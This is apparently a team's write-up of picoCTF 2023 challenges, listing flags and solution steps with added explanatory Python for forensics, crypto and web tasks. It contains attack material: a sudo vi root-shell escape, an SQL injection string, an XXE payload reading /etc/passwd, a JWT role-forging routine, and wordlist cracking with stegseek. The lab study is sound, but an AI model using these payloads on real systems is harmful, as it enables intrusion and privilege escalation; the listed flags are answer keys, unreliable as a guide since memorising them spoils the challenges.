# picoCTF 2023 Competition
Team HejTozBorci
interloper69, jjindra93, OlinK, Zihuatanejo
## General
### money-ware
>flag: picoCTF{Petya}
### repetitions
>flag: picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_c0ac1752}
### Rules 2023
>flag: picoCTF{h34rd_und3r5700d_4ck_cba1c711}
### Permissions
>flag: picoCTF{uS1ng_v1m_3dit0r_021d10ab}
steps:
1. Run the instance and connect+login to the server
2. Search the server folder hierarchy
- ls (nothing)
- cd ..
- cd ..
- ls
- we can see the /root folder
- we are not permitted to enter it
3. Hint 'What permissions do you have?'
- whoami
- id
- sudo -l
- 'User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi'
- lets try that
4. VIM
- https://gtfobins.github.io/ (the sudo entry for vi)
- sudo vi -c ':!/bin/sh' /dev/null drops into a root shell (typing :!/bin/sh inside vi does the same); from there /root can be listed and the flag read
### chrono
>flag: picoCTF{Sch3DUL7NG_T45K3_L1NUX_7754e199}
The task asks "How to automate tasks to run at intervals on linux servers?". That is done with cron, so the job is to find the crontab (or a related file).
steps:
- start server & login via ssh
- ssh picoplayer@saturn.picoctf.net -p55006
- whoami, ls -la and the usual shenanigans
- cd to /etc/ and cat crontab
- BAM, got yo flag
### useless
>flag: picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_5562}
steps:
1. start instance & login via ssh
- ssh picoplayer@saturn.picoctf.net -p 65074
2. Explore folders and script
- ls
- cat useless
- we have to read the script manual to obtain the flag
3. Obtain the flag
- man useless
### Special
>flag:
The spell-checking shell blocks and/or corrects most of the shell commands so they're not able to execute; however the following commands return a relevant value:
- `whoami` typed inside backticks or single quotes
- `awk` is accepted as well
- `grep` is accepted as well
### Specialer
>flag: picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_38f5cc78}
Ugh, finally did it.
1. ssh in
2. notice that hitting TAB shows the autocomplete list, which works as a substitute for ls, but cat isn't allowed
3. `bla=$(<ala/kazam.txt) && echo $bla` to store and then read the file content
## Forensics
### PcapPoisoning
>flag: picoCTF{P64P_4N4L7S1S_SU55355FUL_dd89e21b}
steps:
1. download given file && open in Wireshark
2. Analyze -> Conversations
2a. 5 IPv4 conversations
2b. only one of them carries real payload bytes from A -> B
2c. right-click that conversation -> Apply as Filter -> Selected -> A<->B
3. Find the flag
### hideme
>flag: picoCTF{Hiddinng_An_imag3_within_@n_ima9e_5cf64968}
### who is it
>flag: picoCTF{WilhelmZwalina}
steps:
1. download given file && open terminal
2. strings email-export.eml
3. Find the original sender IP address in any of these 4 headers:
3a. ARC-Authentication
3b. Received
3c. Received-SPF
3d. Authentication-Results
4. whois 173.249.33.206
5. person: Wilhelm Zwalina
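The header hunt in step 3 can be scripted. This is an added example, not code from the writeup: it parses an .eml with the standard library, pulls every IPv4 address out of the trace headers, drops private relay addresses, and returns the bottom-most public Received address (the hop nearest the real sender) as the candidate for the whois step. The message below is constructed; only the address 173.249.33.206 is taken from the writeup so the output can be compared with step 4.

```python
import ipaddress
import re
from email import policy
from email.parser import BytesParser

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
TRACE_HEADERS = ("Received", "Received-SPF", "Authentication-Results", "ARC-Authentication-Results")

# Constructed message (not the challenge file); the public address is the one
# from the writeup so the result lines up with the whois step.
SAMPLE_EML = b"""\
Received: from mail.example.org (mail.example.org. [173.249.33.206])
        by mx.example.net with ESMTPS id abc123
        for <victim@example.net>; Mon, 13 Mar 2023 10:00:00 +0000
Received: from [192.168.1.50] (unknown [192.168.1.50])
        by mail.example.org with ESMTPSA id def456
Received-SPF: pass (example.net: domain of sender@example.org designates 173.249.33.206 as permitted sender) client-ip=173.249.33.206;
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=sender@example.org
From: sender@example.org
To: victim@example.net
Subject: constructed sample

body
"""


def _public(ip):
    """True for a routable address; RFC 1918, loopback, link-local etc. are rejected."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:          # e.g. 999.1.1.1 slipping through the regex
        return False


def public_ips(raw):
    """Every public IPv4 address named in the trace headers, in first-seen order."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    found = []
    for name in TRACE_HEADERS:
        for value in msg.get_all(name, []):
            for ip in IP_RE.findall(str(value)):
                if _public(ip) and ip not in found:
                    found.append(ip)
    return found


def origin_ip(raw):
    """Received headers are prepended hop by hop, so the bottom-most one is nearest
    the sender. Walk them from the bottom and return the first public address."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    for value in reversed(msg.get_all("Received", [])):
        for ip in IP_RE.findall(str(value)):
            if _public(ip):
                return ip
    return None


if __name__ == "__main__":
    # On the real file: public_ips(open("email-export.eml", "rb").read())
    print(public_ips(SAMPLE_EML))
    print(origin_ip(SAMPLE_EML))   # then: whois <that address>
```

The whois lookup itself stays on the command line; the script only tells you which address is worth looking up.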
### FindAndOpen {WIP}
>flag: picoCTF{R34DING_LOKd_fil56_succ3ss_8ec01288}
steps:
1. download given zip + pcap files && open dump.pcap in Wireshark
2. search packets for hints:
- "Flying on Ethernet secret: Is this the flag"
- "Could the flag have been splitted?"
- a base64 string in packet 48 that decodes to "This is the Secret: picoCTF{R34DING_LOKd_"
3. open the zip with the password picoCTF{R34DING_LOKd_ to get into the archive and obtain the rest of the flag
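Both the PcapPoisoning conversation triage above and the FindAndOpen base64 hunt here can be done without Wireshark. This is an added example, not the writeup's or picoCTF's code: a stdlib-only pcap reader that groups IPv4 TCP/UDP packets into conversations, counts payload bytes per direction (the one direction carrying real data is the one worth filtering on), and scans every payload for `picoCTF{` both in clear text and inside base64 runs. The capture it runs on is constructed inline: the addresses, ports and the `picoCTF{constructed_sample_flag}` value are made up, and the base64 piece wraps the first half of the FindAndOpen flag quoted above.

```python
import base64
import re
import struct
from collections import defaultdict

FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}?")   # also matches a first half without the closing brace
B64_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def parse_pcap(data):
    """Yield (src, sport, dst, dport, proto, payload) for every IPv4 TCP/UDP packet."""
    magic = struct.unpack("<I", data[:4])[0]
    endian = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    off = 24                                                 # 24-byte global header
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # Ethernet II + IPv4 only
            continue
        ip = frame[14:]
        ip = ip[:struct.unpack("!H", ip[2:4])[0]]             # drop Ethernet padding
        ihl = (ip[0] & 0x0F) * 4
        proto = ip[9]
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        l4 = ip[ihl:]
        if proto == 6:                                       # TCP: data offset in byte 12
            payload = l4[(l4[12] >> 4) * 4:]
        elif proto == 17:                                    # UDP: fixed 8-byte header
            payload = l4[8:]
        else:
            continue
        sport, dport = struct.unpack("!HH", l4[:4])
        yield src, sport, dst, dport, proto, payload


def conversations(packets):
    """Group by endpoint pair (like Wireshark's Conversations) and count payload bytes per direction."""
    convs = defaultdict(lambda: {"packets": 0, "a_to_b": 0, "b_to_a": 0})
    for src, sport, dst, dport, proto, payload in packets:
        a, b = sorted([(src, sport), (dst, dport)])
        c = convs[(proto, a, b)]
        c["packets"] += 1
        c["a_to_b" if (src, sport) == a else "b_to_a"] += len(payload)
    return dict(convs)


def find_flag_pieces(packets):
    """Return (packet_index, kind, text) for payloads carrying the flag, clear or base64-encoded."""
    hits = []
    for i, pkt in enumerate(packets):
        payload = pkt[-1]
        for m in FLAG_RE.finditer(payload):
            hits.append((i, "clear", m.group().decode()))
        for m in B64_RE.finditer(payload):
            try:
                decoded = base64.b64decode(m.group(), validate=True)
            except ValueError:                               # not valid base64 after all
                continue
            if b"picoCTF{" in decoded:
                hits.append((i, "base64", decoded.decode(errors="replace")))
    return hits


def analyse(pcap_bytes):
    packets = list(parse_pcap(pcap_bytes))
    return conversations(packets), find_flag_pieces(packets)


# --- constructed sample capture (not from the challenge) ---------------------
def build_frame(src, sport, dst, dport, payload):
    """Ethernet/IPv4/UDP frame with zeroed checksums; enough for the parser above."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + udp


def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.1", 4000, "10.0.0.2", 53, b""),      # a conversation with no payload at all
    build_frame("10.0.0.2", 53, "10.0.0.1", 4000, b""),
    build_frame("10.0.0.3", 5555, "10.0.0.4", 8080, b"Flying on Ethernet secret: Is this the flag"),
    build_frame("10.0.0.3", 5555, "10.0.0.4", 8080,
                b"This is the Secret: " + base64.b64encode(b"picoCTF{R34DING_LOKd_")),
    build_frame("10.0.0.4", 8080, "10.0.0.3", 5555, b"picoCTF{constructed_sample_flag}"),
])

if __name__ == "__main__":
    convs, hits = analyse(SAMPLE_PCAP)   # real file: analyse(open("dump.pcap", "rb").read())
    for key, stats in convs.items():
        print(key, stats)
    for hit in hits:
        print(hit)
```

The conversation whose byte counters are non-zero in one direction is the one to filter on; the base64 scan only attempts runs of 16 or more alphabet characters so ordinary words do not trigger decode attempts.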
### MSB
>flag: picoCTF{15_y0ur_que57_qu1x071c_0r_h3r01c_b5e03bc5}
steps:
- after banging our heads for 2 hours and figuring out why the seventh bit is interesting, Zihuatanejo peeked onto Discord to find a hint from other users -> sigbits
- download sigbits.py
- open console and run the following:
- python sigbits.py -t=msb -o=rgb -out=output.txt -e=column Ninja-and-Prince-Genji-Ukiyoe-Utagawa-Kunisada.flag.png
- cat output.txt && search "ctf"
- somehow grepping did not work for me, it displayed the whole content of the file
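What sigbits does with `-t=msb -o=rgb -e=column` is a bit-plane extraction: take bit 7 of every R, G and B sample, visiting pixels column by column, and pack the bits into bytes. This is an added example, not sigbits itself: a pure-Python version of that extraction, run on a constructed cover image (a flat grey block with `picoCTF{constructed_msb}` written into the MSBs) so no imaging library is needed. On the real PNG you would build the pixel rows from Pillow's `Image.open(path).convert("RGB")`.

```python
import re


def _walk(width, height, order):
    """Pixel visiting order: column-major (x outer) like sigbits' -e=column, or row-major."""
    if order == "column":
        return ((x, y) for x in range(width) for y in range(height))
    return ((x, y) for y in range(height) for x in range(width))


def extract_bitplane(pixels, bit=7, order="column"):
    """Collect bit `bit` (7 = MSB, 0 = LSB) of every R, G, B sample and pack 8 bits per byte."""
    height, width = len(pixels), len(pixels[0])
    out, acc, n = bytearray(), 0, 0
    for x, y in _walk(width, height, order):
        for ch in range(3):
            acc = (acc << 1) | ((pixels[y][x][ch] >> bit) & 1)
            n += 1
            if n == 8:
                out.append(acc)
                acc, n = 0, 0
    return bytes(out)


def find_flag(data):
    """The extracted stream has no newlines, so search it as one blob."""
    m = re.search(rb"picoCTF\{[^}]*\}", data)
    return m.group().decode() if m else None


# --- constructed cover image (not the challenge PNG) -------------------------
def embed_bitplane(width, height, message, bit=7, order="column"):
    """Flat grey image with `message` written into the chosen bit of each channel."""
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    pixels = [[[0x55, 0x33, 0x0F] for _ in range(width)] for _ in range(height)]
    k = 0
    for x, y in _walk(width, height, order):
        for ch in range(3):
            if k == len(bits):
                return pixels
            px = pixels[y][x]
            px[ch] = (px[ch] & ~(1 << bit)) | (bits[k] << bit)
            k += 1
    return pixels


IMAGE = embed_bitplane(16, 8, b"picoCTF{constructed_msb}")

if __name__ == "__main__":
    print(find_flag(extract_bitplane(IMAGE, bit=7, order="column")))  # the flag
    print(find_flag(extract_bitplane(IMAGE, bit=7, order="row")))     # None: wrong walk order
    print(find_flag(extract_bitplane(IMAGE, bit=0, order="column")))  # None: wrong bit plane
```

Two things the example makes visible: the walk order (row vs column) and the bit plane both have to match, otherwise the bytes are scrambled even though every bit is present. On the shell side, the reason plain grep prints the whole file is that the extracted stream is one long line; `grep -o 'picoCTF{[^}]*}' output.txt` prints only the match.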
### Invisible WORDs
>flag:
steps:
1. download given file && open terminal
2. Hint 2: "How's the image quality?"
- foremost -i output.bmp
- 1 MB file, resolution 960x540
- binwalk, strings, zsteg ... nothing
## Reverse Engineering
### Reverse
>flag: picoCTF{3lf_r3v3r5ing_succe55ful_fe733618}
steps:
1. download given file && open terminal
2. strings ret
3. the flag is near the top of the output
### Safe Opener 2
>flag: picoCTF{SAf3_0p3n3rr_y0u_solv3d_it_d6afee27}
steps:
1. download given file && open terminal
2. strings SafeOpener.class
3. the flag is in the middle of the output
### timer
>flag: picoCTF{t1m3r_r3v3rs3d_succ355fully_17496}
steps:
1. download given file && open terminal
2. Analyze it with the MobSF tool
- run MobSF
- import timer.apk
- the Android version name is the flag
- the same value can be read from the manifest without MobSF: aapt dump badging timer.apk | grep versionName

### Ready Gladiator 0
>flag: picoCTF{h3r0_t0_z3r0_4m1r1gh7_e1610ed2}
steps:
1. download given file && open terminal
2. run the app using command: nc saturn.picoctf.net 50612 < imp.red
3. Read the result: for this level the warrior has to lose every round (no ties), so the file has to change
4. Change the imp.red file
- change the operands of the 'mov' instruction
- for example to: mov 0, 10 or mov 5, 1 (either way the next cell the warrior executes is an empty DAT, so it dies at once)
5. Run the app again with the changed file to obtain the flag
### Ready Gladiator 1
>flag: picoCTF{1mp_1n_7h3_cr055h41r5_441be1fc}
steps:
1. download given file && open terminal
2. run the app using command: nc saturn.picoctf.net 50612 < imp.red
3. Run it: the result is not a win; for this level the warrior has to beat the Imp at least once, so the file has to change
4. Change the imp.red file
- changing only the mov operands doesn't work here
- the hint says to read the beginner documentation for the CoreWars game
- https://corewar-docs.readthedocs.io/en/latest/corewar/warriors/
5. Edit imp.red into the warrior from the documentation (the classic Dwarf: it drops a DAT bomb on every fourth cell, and when the Imp steps onto a bomb it dies):
```
add #4, 3
mov 2, @2
jmp -2
dat #10, #5
```
- run the app to obtain the flag
### Ready Gladiator 2
>flag:
steps:
1. download given file && open terminal
2. run the app using command: nc saturn.picoctf.net 50612 < imp.red
3. As we can see, we automatically lost
- we have to change the file somehow so that the warrior wins and we obtain the flag
4. Change the imp.red file
### Virtual Machine 0
>flag:
1. download the given files && open terminal
2. unzip and cat input.txt -> the file is Virtual-Machine-0.dae, a Collada project which can be opened in any
3. open it in any 3D app (Blender -> File -> Import -> Collada (.dae))
4. the 3D model is a black LEGO box

## Cryptography
### rotation
>flag: picoCTF{r0tat1on_d3crypt3d_7ecd1c61}
steps:
1. https://www.dcode.fr/rot-cipher
2. input the rotated text: xqkwKBN{z0bib1wv_l3kzgxb3l_7mkl1k61}
3. Decrypt
4. search page for string "picoCTF"
### ReadMyCert
>flag: picoCTF{read_mycert_7834c5f2}
steps:
1. download the given file && open terminal
2. cat readmycert.csr
3. copy the certificate request (the long base64 string between the PEM markers)
4. https://gchq.github.io/CyberChef/
5. recipe: From Base64 (the flag is readable in the decoded subject)
- the same without CyberChef: openssl req -in readmycert.csr -noout -text
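Why "From Base64" is already enough: a PEM CSR is base64 over DER, and DER stores the subject's attribute values as plain strings, so the CN survives decoding untouched. This is an added example, not the writeup's or CyberChef's code: it strips the PEM armor, walks the DER tag/length/value nesting and prints every string together with the OID that precedes it. The CSR-shaped blob is constructed inline (version and subject only; no public key, no signature) just to exercise the parser, and the `picoCTF{constructed_cn}` value is made up.

```python
import base64

OID_NAMES = {"2.5.4.3": "commonName", "2.5.4.10": "organizationName", "2.5.4.6": "countryName"}
STRING_TAGS = {0x0C: "UTF8String", 0x13: "PrintableString", 0x16: "IA5String"}


def pem_to_der(pem):
    """Drop the -----BEGIN/END----- lines and base64-decode the rest."""
    body = "".join(line for line in pem.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body)


def _read_tlv(buf, pos):
    """Return (tag, value_start, value_end, next_pos) for the DER element at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length, pos + length


def decode_oid(raw):
    """First byte packs the first two arcs (40*a + b); the rest are base-128 with continuation bits."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def extract_strings(der):
    """Depth-first walk; collect (attribute name, string) for every string element."""
    found, last_oid = [], [None]

    def walk(start, end):
        pos = start
        while pos < end:
            tag, vstart, vend, nxt = _read_tlv(der, pos)
            if tag & 0x20:                  # constructed: SEQUENCE, SET, context tags -> recurse
                walk(vstart, vend)
            elif tag == 0x06:               # OBJECT IDENTIFIER names the attribute that follows
                last_oid[0] = decode_oid(der[vstart:vend])
            elif tag in STRING_TAGS:
                found.append((OID_NAMES.get(last_oid[0], last_oid[0]), der[vstart:vend].decode()))
            pos = nxt

    walk(0, len(der))
    return found


# --- constructed CSR-shaped sample (not the challenge file) ------------------
def _tlv(tag, value):
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    lb = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def _oid(dotted):
    arcs = list(map(int, dotted.split(".")))
    out = [arcs[0] * 40 + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def _attr(oid, text, tag=0x0C):
    """RelativeDistinguishedName: SET { SEQUENCE { OID, string } }."""
    return _tlv(0x31, _tlv(0x30, _oid(oid) + _tlv(tag, text.encode())))


SUBJECT = _tlv(0x30, _attr("2.5.4.6", "US", 0x13) + _attr("2.5.4.10", "Example Org")
               + _attr("2.5.4.3", "picoCTF{constructed_cn}"))
SAMPLE_DER = _tlv(0x30, _tlv(0x30, _tlv(0x02, b"\x00") + SUBJECT))   # version 0 + subject
SAMPLE_PEM = ("-----BEGIN CERTIFICATE REQUEST-----\n" + base64.encodebytes(SAMPLE_DER).decode()
              + "-----END CERTIFICATE REQUEST-----\n")

if __name__ == "__main__":
    for name, value in extract_strings(pem_to_der(SAMPLE_PEM)):   # real file: open("readmycert.csr").read()
        print(f"{name}: {value}")
```

The walker ignores INTEGER, BIT STRING and OCTET STRING elements, which is where a real CSR's key and signature live, so on a genuine file the output is just the subject attributes.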
### HideToSee
>flag: picoCTF{atbash_crack_7142fde9}
steps:
1. download given file
2. binwalk, strings, zsteg... no output, only a picture
3. stegseek tool
- stegseek atbash.jpg /usr/share/wordlists/rockyou.txt
- cat atbash.jpg.out
- krxlXGU{zgyzhs_xizxp_4v847zx1}
- decode it with the Atbash cipher (https://www.dcode.fr/atbash-cipher)
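Both the rotation challenge above and this Atbash one are letter substitutions that leave digits, braces and underscores alone, so the known prefix `picoCTF{` is enough to crack them offline. This is an added example, not the dcode.fr pages the writeup used: it tries every ROT shift until the plaintext starts with the flag prefix, and applies Atbash, which is its own inverse. The inputs are the two ciphertexts quoted in this writeup.

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def rot(text, shift):
    """Shift letters by `shift` positions, keeping case; everything else passes through."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def crack_rot(ciphertext, prefix="picoCTF{"):
    """Try all 26 shifts; return (shift, plaintext) for the first one yielding the prefix."""
    for shift in range(26):
        candidate = rot(ciphertext, shift)
        if candidate.startswith(prefix):
            return shift, candidate
    return None


def atbash(text):
    """Map a<->z, b<->y, ... (and A<->Z); applying it twice returns the original."""
    table = str.maketrans(LOWER + UPPER, LOWER[::-1] + UPPER[::-1])
    return text.translate(table)


if __name__ == "__main__":
    print(crack_rot("xqkwKBN{z0bib1wv_l3kzgxb3l_7mkl1k61}"))   # (18, 'picoCTF{r0tat1on_d3crypt3d_7ecd1c61}')
    print(atbash("krxlXGU{zgyzhs_xizxp_4v847zx1}"))
```

A decrypting shift of 18 is the same as saying the text was encrypted with ROT8; for a ciphertext without a known prefix, print all 26 candidates and pick the readable one.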
## Web Exploitation
### findme
>flag: picoCTF{proxies_all_the_way_c4dbc2d6}
steps:
1. start instance and go to the website
2. log in with the given credentials (test / test!)
- nothing useful; the search bar has nothing in it when inspecting with F12
3. log in again, this time with Burp Suite capturing the traffic
- the login is followed by redirects whose id parameters are base64: the id seen in the Referer is the first part of the flag and the id of the next redirect is the second part
- decoded value: picoCTF{proxies_all_the_way_01e748db}

### MatchTheRegex
>flag: picoCTF{succ3ssfully_matchtheregex_36f43841}
steps:
1. start instance and go to the website
2. the website consists just of a title, a text input field and a submit button
3. inspect the code (F12)
- Debugger -> index
- by reading the code we can see what the input is matched against
- if we enter the "name" of the website, its title, we get the correct response
4. enter "picoCTF" to obtain the flag

### More SQLi
>flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_62aa7500}
steps:
1. start instance and go to the website
2. open Burp Suite and route the traffic with a proxy (eg. FoxyProxy)
3. login on the website as:
- username: test
- password: test
4. in Burp Suite select the POST request with the credentials above and send it to Repeater
5. construct an SQL injection by adding "' OR 1=1 --" to the password field
Voilà, the flag is in the response

### SOAP
>flag: picoCTF{XML_3xtern@l_3nt1t1ty_55662c16}
steps:
1. start instance and go to the website
2. run Burp Suite and turn on the proxy so all traffic passes through it
3. click the article links on the website and observe the changing POST requests (the body is XML)
4. send the request to Burp's Repeater and replace the body with the following:
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data><ID>
&xxe;
</ID></data>
```
Voilà, the response now contains the file.

learn more about XXE on [Portswigger](https://portswigger.net/web-security/xxe)
### Java Code Analysis!?! {WIP}
>flag:
the goal is to read the flag book, but it requires admin access
1. start the instance and navigate to the website
2. start Burp Suite and route the traffic through the proxy (e.g. FoxyProxy)
3. log in as user:user
4. examine the book posts
5. JSON web token
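Step 5 is where the writeup stops, so here is the general technique as an added example, not the challenge's code: take the JWT apart without verifying it (the header and payload are only base64url-encoded JSON), then re-sign a modified payload with HS256. The token, the claim names `sub`/`role` and the secret `constructed-secret` are all made up for the example; in the challenge a usable secret would have to come out of the Java source, which is not reproduced here.

```python
import base64
import hashlib
import hmac
import json


def _b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt(token):
    """Return (header, payload) dicts; the signature is deliberately ignored here."""
    header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def sign_hs256(header, payload, secret):
    """Build header.payload.signature with HMAC-SHA256 over 'header.payload'."""
    head = _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{_b64url_encode(sig)}"


def verify_hs256(token, secret):
    """What the server should do on every request: recompute and compare in constant time."""
    head, body, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url_decode(sig), expected)


def forge_role(token, secret, role="Admin"):
    """Decode a low-privilege token, swap the role claim, re-sign with the known secret."""
    header, payload = decode_jwt(token)
    return sign_hs256(header, dict(payload, role=role), secret)


# Constructed values (not from the challenge): the secret and a 'Free' user's token.
SECRET = "constructed-secret"
USER_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "user", "role": "Free"}, SECRET)

if __name__ == "__main__":
    print(decode_jwt(USER_TOKEN))
    admin_token = forge_role(USER_TOKEN, SECRET)
    print(admin_token)
    print(verify_hs256(admin_token, SECRET))   # True: the server cannot tell it apart
```

Forging only works if the signing secret is known (or guessable); the decode step, on the other hand, needs no secret at all, which is why role and user claims in a JWT are readable to anyone holding the token.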


## Binary Exploitation
### two sum
>flag: picoCTF{Tw0_Sum_Integer_Bu773R_0v3rfl0w_4b563da7}
steps:
1. Run the instance && download the given source file
2. Connect to the given host and port via terminal
3. Inspect the source code of the app
- both num1 and num2 have to be > 0, and the overflow check only ever returns 0 or -1
- so let's overflow the int values
- in C the maximum value of a signed int is INT_MAX = 2147483647
4. Run the app in the terminal and enter 2147483647 for both num1 and num2
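To see offline why two INT_MAX values do the trick, here is an added example in Python, not the challenge's C source: it emulates C's 32-bit two's-complement `int` so the wrapped sum can be computed, and implements the common post-hoc check (`a > 0 && b > 0 && result < 0`, and the mirror case for negatives). That check pattern is an assumption about the challenge; its exact source is not reproduced here.

```python
INT_MIN, INT_MAX = -2**31, 2**31 - 1


def to_int32(value):
    """Wrap an arbitrary Python int to two's-complement 32-bit, like storing into a C int."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value & 0x80000000 else value


def c_add(a, b):
    """What a + b becomes once the result lands in an int."""
    return to_int32(a + b)


def overflowed(a, b):
    """Textbook post-hoc check: two positives that sum to a negative (or two negatives to a positive)."""
    result = c_add(a, b)
    return (a > 0 and b > 0 and result < 0) or (a < 0 and b < 0 and result > 0)


def smallest_positive_overflow(a):
    """For a fixed positive a, the smallest positive b that wraps the sum."""
    return INT_MAX - a + 1


if __name__ == "__main__":
    print(c_add(INT_MAX, INT_MAX))            # -2
    print(overflowed(INT_MAX, INT_MAX))       # True
    print(overflowed(1, 2))                   # False
    print(smallest_positive_overflow(INT_MAX))  # 1: INT_MAX + 1 already wraps to INT_MIN
```

One caveat for the C side: signed overflow is undefined behaviour, so a compiler is free to delete a post-hoc `result < 0` check when it can prove `a` and `b` are positive; the challenge binary keeps it because it was built without that optimisation taking effect, but your own code should test before adding (`a > INT_MAX - b`) or use `__builtin_add_overflow`.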

### babygame01 {WIP}
>flag:
steps:
1. Run the instance && run the game with nc saturn.picoctf.net <port>
2. a map; by entering w/a/s/d you move the @, the goal is to get to the X at position 29 89
3. strings game
- there is a flag.txt file
- many useful commands to use, let's try them
4. run the game and try:
- print flag (gets us to the end automatically)
- print flag.txt (now working, same as previous)
-
5. Disassemble the game file
- open it in Ghidra
- inspect the functions
- the _fini function works with the flag.txt file
- address: 0804a00a
// babygame0 and babygame1 differ in "print_flag_status"
### hijacking
>flag:
steps:
1. Run the instance && connect via ssh
- ssh picoctf@saturn.picoctf.net -p64707
2. ls, whoami, ls -al
3. sudo -l
- we can run /home/picoctf/.server.py with sudo
- sudo vi .server.py
4. Edit the .server.py file
-
- sudo /usr/bin/python3 /home/picoctf/.server.py
- we obtained root access
5. Search for the flag
- whoami, ls
- cd /root
- ls -al
- cat .flag.txt